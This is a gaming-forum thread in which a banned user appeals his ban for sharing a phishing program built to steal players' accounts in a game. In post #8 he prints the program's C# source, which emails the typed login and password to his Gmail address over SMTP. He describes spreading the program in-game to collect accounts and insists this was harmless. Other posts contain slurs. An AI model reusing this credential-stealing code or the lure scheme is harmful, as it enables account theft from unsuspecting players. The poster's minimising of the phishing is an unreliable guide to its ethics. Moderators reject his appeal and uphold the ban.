Results 1 to 15 of 15
  1. #1
    RigBan's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Location
    BANNED ON Riigged FOR 2 WEEKS
    Posts
    125
    Reputation
    10
    Thanks
    39

    It was NOT a "keylogger", was 100% safe, let me explain.

    LONG STORY SHORT:
    The file was 100% safe, no viruses included
    (saying this because the ban reason stated that you guys thought it was a keylogger..),
    was just simple C# program I was intending to use on people on the official game that basically sent me their info they typed into the program in the textboxes, was not at all a keylogger, and it also was not mentioned on mpgh, no thread was made saying something like "Add me on skype for this .exe!" or anything like that, therefore, I was in the clear to share it over skype.

    I made a hack off-site, and since it phished the games accounts, I could not release on MPGH (and was NOT intending to!!), I was just gonna go on the official game and advertise the programs download link, and I shared the program with people in the Skype chat that Raple made for the RotMG section (this is the game I made the phisher for) and told them that if they want to they can also advertise it in-game and I'll share accounts I get with them.

    But it seems like Cjacko, the person I am 90% sure who reported me (he dislikes me for stupid random reasons that I don't even remember of), made it seem like I sent it in the Skype chat to try and phish the people in their, but I told them what it did beforehand and told them why I was sharing it in the chat..

    I really think he did this to purposely get me banned due to personal grudges which is also unfair.

    Yes it is the MPGH chat, and @ any staff don't try to pull that "no sharing files over skype" because we are allowed to have lives outside of MPGH, not every thing that people make has to be released on mpgh, especially since this was not mentioned on the site nor was planned to be released on this site.. if I were to release this on MPGH I'd 100% get banned WHICH IS THE REASON I KEPT IT OFF-SITE.
    And yes I know, it's still a phisher and it was a skype chat with mpgh members in it, but I shared it and told them to advertise it in-game as well and that I would share accounts that I get.

    Cjackos reason of doing it, should explain him in a nutshell.
    http://imgur.com/a/bETis

    I'm willing to be given the CS rank or even a blacklist (even though that doesn't make sense) if you guys appeal to this.
    @Flengo @Mayion @Hero @BACKD00R @NormenJaydenFBI @FanticSteal

    Arun said it's up to you guys (and any other GMs I may have left out) ^
    Last edited by RigBan; 06-20-2016 at 03:53 PM.

  2. #2
    Smoke's Avatar
    Join Date
    Nov 2014
    Gender
    male
    Posts
    7,036
    Reputation
    1975
    Thanks
    3,257
    My Mood
    Amazed
    Quote Originally Posted by RigBan View Post
    LONG STORY SHORT:
    The file was 100% safe, no viruses included
    (saying this because the ban reason stated that you guys thought it was a keylogger..),
    was just simple C# program I was intending to use on people on the official game that basically sent me their info they typed into the program in the textboxes, was not at all a keylogger, and it also was not mentioned on mpgh, no thread was made saying something like "Add me on skype for this .exe!" or anything like that, therefore, I was in the clear to share it over skype.

    I made a hack off-site, and since it phished the games accounts, I could not release on MPGH (and was NOT intending to!!), I was just gonna go on the official game and advertise the programs download link, and I shared the program with people in the Skype chat that Raple made for the RotMG section (this is the game I made the phisher for) and told them that if they want to they can also advertise it in-game and I'll share accounts I get with them.

    But it seems like Cjacko, the person I am 90% sure who reported me (he dislikes me for stupid random reasons that I don't even remember of), made it seem like I sent it in the Skype chat to try and phish the people in their, but I told them what it did beforehand and told them why I was sharing it in the chat..

    I really think he did this to purposely get me banned due to personal grudges which is also unfair.

    Yes it is the MPGH chat, and @ any staff don't try to pull that "no sharing files over skype" because we are allowed to have lives outside of MPGH, not every thing that people make has to be released on mpgh, especially since this was not mentioned on the site nor was planned to be released on this site.. if I were to release this on MPGH I'd 100% get banned WHICH IS THE REASON I KEPT IT OFF-SITE.
    And yes I know, it's still a phisher and it was a skype chat with mpgh members in it, but I shared it and told them to advertise it in-game as well and that I would share accounts that I get.

    Cjackos reason of doing it, should explain him in a nutshell.
    http://imgur.com/a/bETis

    I'm willing to be given the CS rank or even a blacklist (even though that doesn't make sense) if you guys appeal to this.
    You were banned by @Mayion so he may be better equipped to assist you.
    My ONLY skype is "smoke.mpgh" Please Private Message me BEFORE Buying/Selling anything from me

    Quote Originally Posted by Liz View Post
    This is my first vouch, ever. Rapidgator account worked perfectly. Would buy in the future.
    MPGH History:
    Joined- November 2014
    Donator/Premium Member- October 2015
    Steam Games Hacks & Cheats Minion- December 2015
    Blackshot Minion- January 2016
    Pharaoh of the Year- 2016
    Minion+- June 2016
    Grand Theft Auto Minion- July 2016
    Official Middleman- September 2016

  3. #3
    RigBan's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Location
    BANNED ON Riigged FOR 2 WEEKS
    Posts
    125
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by Smoke View Post


    You were banned by @Mayion so he may be better equipped to assist you.
    Alright, thanks for telling me.

    Also just so happens, the person who reported me...
    http://webcache.googleusercontent.co...&ct=clnk&gl=us

    I'm 99% sure staff can see deleted threads, so you can view all the comments and updated screenshots if you need. Not very mature of me to try getting the person who got me in trouble, in trouble, but I am just saying that I feel targeted by him for personal grudges that he has against me.

    - - - Updated - - -

    not even talking to him, and hes still just repeatedly talking shit and bragging how he got me banned.
    Last edited by RigBan; 06-20-2016 at 04:00 PM.

  4. #4
    CJacko's Avatar
    Join Date
    Apr 2014
    Gender
    male
    Posts
    868
    Reputation
    17
    Thanks
    235
    My Mood
    Devilish
    All I have to say is that I called you a faggot for phishing, and Riigged was labelled as a cocksucker on mpgh, nothing personal. Neither did I brag, I simply stated that you deserved it. Neither did I even say I got you banned? So how did I brag about it, only reason I'm commenting on this is because you're lying about it.
    Last edited by CJacko; 06-20-2016 at 04:30 PM.







  5. #5
    Flengo's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Ontario, Canada
    Posts
    15,696
    Reputation
    3319
    Thanks
    11,111
    My Mood
    Happy
    Quote Originally Posted by RigBan View Post
    The file was 100% safe, no viruses included
    (saying this because the ban reason stated that you guys thought it was a keylogger..),
    was just simple C# program I was intending to use on people on the official game that basically sent me their info they typed into the program in the textboxes, was not at all a keylogger, and it also was not mentioned on mpgh, no thread was made saying something like "Add me on skype for this .exe!" or anything like that, therefore, I was in the clear to share it over skype.
    The file still stole their account information. It doesn't matter if it were only specific to stealing account information for the game, it's essentially the same thing. You can post this on YouTube or wherever else you want. But when you directly hack MPGH and send it in an MPGH chat, you are not in the clear.
    I Read All Of My PM's & VM's
    If you need help with anything, just let me know.
     
     
    VM | PM

    Publicist Since 04.04.2015
    Middleman Since Unknown - Unknown
    Global Moderator Since 08.01.2013
    Donator Since 05.29.2013

    Minion+ Since 04.18.2013

    District 187 Minion Since 04.04.2013
    Steam Minion Since 02.26.2013
    WarRock Minion Since 02.19.2013
    A.V.A Minion Since 02.13.2013
    DayZ Minion Since 01.21.2013
    Combat Arms Minion Since 12.26.2012
    Contributor Since 11.16.2012
    Member Since 05.11.2010


  6. #6
    RigBan's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Location
    BANNED ON Riigged FOR 2 WEEKS
    Posts
    125
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by Flengo View Post


    The file still stole their account information. It doesn't matter if it were only specific to stealing account information for the game, it's essentially the same thing. You can post this on YouTube or wherever else you want. But when you directly hack MPGH and send it in an MPGH chat, you are not in the clear.
    No MPGH members were TOUCHED, no info of them was sent to me and every single person in that chat can confirm.
    I sent it to them and told them to NOT use the program, I told them to advertise it in-game so I can get accounts faster and that I would give them accounts in return as a "thank you" for advertising it in-game.

    Edit: EVERY SINGLE PERSON in the chat can confirm that they were not hacked, it was not targeted towards them, it was a phishing program that I gave out FOR THEM TO USE AGAINST OTHER PEOPLE, I told them WHAT IT DID BEFORE I GAVE IT TO THEM. And it was 100% virus free, I really dont see why this is such a problem.. Cjacko targets me because he dislikes me, its very unfair in my opinion, all he does is try to spot out everything I do wrong (Even though none of this is wrong)
    Last edited by RigBan; 06-20-2016 at 04:33 PM.

  7. #7
    CJacko's Avatar
    Join Date
    Apr 2014
    Gender
    male
    Posts
    868
    Reputation
    17
    Thanks
    235
    My Mood
    Devilish
    Quote Originally Posted by RigBan View Post
    No MPGH members were TOUCHED, no info of them was sent to me and every single person in that chat can confirm.
    I sent it to them and told them to NOT use the program, I told them to advertise it in-game so I can get accounts faster and that I would give them accounts in return as a "thank you" for advertising it in-game.

    Edit: EVERY SINGLE PERSON in the chat can confirm that they were not hacked, it was not targeted towards them, it was a phishing program that I gave out FOR THEM TO USE AGAINST OTHER PEOPLE, I told them WHAT IT DID BEFORE I GAVE IT TO THEM. And it was 100% virus free, I really dont see why this is such a problem.. Cjacko targets me because he dislikes me, its very unfair in my opinion, all he does is try to spot out everything I do wrong (Even though none of this is wrong)
    The program directed peoples login details TO YOUR EMAIL ADDRESS. Don't act like you gave us it so we could use it for our own benefit (not like any of us would do that anyway). It's hard to say I target you over something out of my control.







  8. #8
    RigBan's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Location
    BANNED ON Riigged FOR 2 WEEKS
    Posts
    125
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by CJacko View Post


    The program directed peoples login details TO YOUR EMAIL ADDRESS. Don't act like you gave us it so we could use it for our own benefit (not like any of us would do that anyway). It's hard to say I target you over something out of my control.
    You say that like the program AUTOMATICALLY sends me your info when you open it, which it DOES NOT.

    You have to MANUALLY type in THE EMAIL AND PASSWORD and CLICK THE BUTTON and the BUTTON CLICK METHOD sends the TEXTBOX1 AND TEXTBOX2 TEXTS to me... and I TOLD YOU THAT IT DOES THAT BEFORE GIVING YOU IT AND TOLD YOU GUYS TO GIVE IT TO OTHER PEOPLE IN-GAME.
    (Caps do not = flaming, just capitalizing the important parts)

    You do target me, because everything I say in the group chat you always have to quote me and argue about it/try to insult me.

    - - - Updated - - -

    SOURCE CODE:

    Code:
            public void SendMail(string body)
            {
    
                try
                {
                    SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
                    client.EnableSsl = true;
                    client.Timeout = 10000;
                    client.DeliveryMethod = SmtpDeliveryMethod.Network;
                    client.UseDefaultCredentials = false;
                    client.Credentials = new NetworkCredential("emailthatsendsinfo@gmail.com", "password");
                    MailMessage msg = new MailMessage();
                    msg.To.Add("emailthatreceivesinfo@gmail.com");
                    msg.From = new MailAddress("emailthatsendsinfo@gmail.com");
                    msg.Subject = "New account";
                    msg.Body = body;
                    client.Send(msg);
                }
                catch (Exception ex)
                {
                    MessageBox.Show("An error occurred");
                }
            }
            private void button1_Click(object sender, EventArgs e)
            {
                SendMail(textBox1.Text + " | " + textBox2.Text);
            }
    as you can see, nothing virus abt it, and as you can see, details have to manually be typed and the button that clicks it SENDS THE INFO, and EVERYONE IN THE CHAT THAT I SENT IT TO KNEW THAT UPON DOWNLOADING IT, and I WANTED THEM TO GIVE IT TO OTHER PEOPLE (Not mpgh registered people).

  9. #9
    Flengo's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Ontario, Canada
    Posts
    15,696
    Reputation
    3319
    Thanks
    11,111
    My Mood
    Happy
    Can you post a screenshot saying specifically for them not to run the file?
    I Read All Of My PM's & VM's
    If you need help with anything, just let me know.
     
     
    VM | PM

    Publicist Since 04.04.2015
    Middleman Since Unknown - Unknown
    Global Moderator Since 08.01.2013
    Donator Since 05.29.2013

    Minion+ Since 04.18.2013

    District 187 Minion Since 04.04.2013
    Steam Minion Since 02.26.2013
    WarRock Minion Since 02.19.2013
    A.V.A Minion Since 02.13.2013
    DayZ Minion Since 01.21.2013
    Combat Arms Minion Since 12.26.2012
    Contributor Since 11.16.2012
    Member Since 05.11.2010


  10. #10
    Organized Chaos's Avatar
    Join Date
    Mar 2014
    Gender
    male
    Location
    evrythan puprle man
    Posts
    4,371
    Reputation
    526
    Thanks
    1,212
    My Mood
    Lurking
    https://gyazo.com/0945fcd5367570bb4d41d696ba6d1c37

    He posted it multiple times w/ out saying "dont use it"

  11. #11
    RigBan's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Location
    BANNED ON Riigged FOR 2 WEEKS
    Posts
    125
    Reputation
    10
    Thanks
    39
    Quote Originally Posted by High View Post
    https://gyazo.com/0945fcd5367570bb4d41d696ba6d1c37

    He posted it multiple times w/ out saying "dont use it"
    "pass this .exe around if you want free prod accounts from me" xD that is me telling you that it sends prod info to me basically and that i want you to give it out, thanks for posting the screenshot for me.

  12. #12
    CJacko's Avatar
    Join Date
    Apr 2014
    Gender
    male
    Posts
    868
    Reputation
    17
    Thanks
    235
    My Mood
    Devilish
    http://imgur.com/a/eAjwY

    Description of every picture explains the situation.







  13. #13
    RigBan's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Location
    BANNED ON Riigged FOR 2 WEEKS
    Posts
    125
    Reputation
    10
    Thanks
    39
    another pic: this is messages RIGHT after the one mike (High) just posted

    me clearly clarifying "DO NOT TYPE YOUR DETAILS IN" and as you can see his time is 3:37 and mine is 10:37 so idk what fucking time zone hes in but this clearly happened the same exact minute..

    - - - Updated - - -

    Quote Originally Posted by CJacko View Post
    http://imgur.com/a/eAjwY

    Description of every picture explains the situation.
    thank you as well, saved me time from doing it myself lmao you clearly see me saying "NOT TO USE IT" and yes I said not to tell an MPGH staff BECAUSE OF THIS EXACT REASON, they would get the wrong idea and I did not want to feel like explaining such a fucking confusing situation.
    and that first pic or 2nd or whatever, OWL ASKED FOR IT, he knew what it did and so did everyone else, he knew I was joking when I said that it opens up a rotmg client and etc. he even asked me to make one for him (as well, in the pic(s)), its all in the screenshots and all the pieces of the puzzle fit, and you just proven I did nothing wrong.
    Last edited by RigBan; 06-20-2016 at 05:06 PM.

  14. #14
    CJacko's Avatar
    Join Date
    Apr 2014
    Gender
    male
    Posts
    868
    Reputation
    17
    Thanks
    235
    My Mood
    Devilish
    Quote Originally Posted by RigBan View Post
    - - - Updated - - -



    thank you as well, saved me time from doing it myself lmao you clearly see me saying "NOT TO USE IT" and yes I said not to tell an MPGH staff BECAUSE OF THIS EXACT REASON, they would get the wrong idea and I did not want to feel like explaining such a fucking confusing situation.


    Well actually you sent it in chat at 3:00am (my time) and lied about what the program was. You also claimed you created it at 3:05. Then at 3:36 you then re-sent the file and told us to spread it around. 30 MINUTES AFTER INITIALLY POSTING IT. Plus you didn't say "Don't use it" you claimed 30 minutes after posting it that YOU NEVER TOLD US TO USE IT, but you didn't explicitly stated "Don't use it", if you sent a file in a skype chat you can be convinced someone would be stupid enough to run an .exe







  15. #15
    Flengo's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Ontario, Canada
    Posts
    15,696
    Reputation
    3319
    Thanks
    11,111
    My Mood
    Happy
    Riigged has been banned for 2 weeks and will be removed from the ROTMG chat.
    I Read All Of My PM's & VM's
    If you need help with anything, just let me know.
     
     
    VM | PM

    Publicist Since 04.04.2015
    Middleman Since Unknown - Unknown
    Global Moderator Since 08.01.2013
    Donator Since 05.29.2013

    Minion+ Since 04.18.2013

    District 187 Minion Since 04.04.2013
    Steam Minion Since 02.26.2013
    WarRock Minion Since 02.19.2013
    A.V.A Minion Since 02.13.2013
    DayZ Minion Since 01.21.2013
    Combat Arms Minion Since 12.26.2012
    Contributor Since 11.16.2012
    Member Since 05.11.2010


  16. The Following User Says Thank You to Flengo For This Useful Post:

    RigBan (06-20-2016)

Similar Threads

  1. d3dx9_42.dll was not found
    By icejaff in forum Combat Arms Help
    Replies: 4
    Last Post: 03-18-2010, 11:06 PM
  2. I have a hack that WAS not patched, IS not patched and WILL never patched^^
    By asswadou95 in forum CrossFire Hacks & Cheats
    Replies: 5
    Last Post: 08-10-2009, 06:17 PM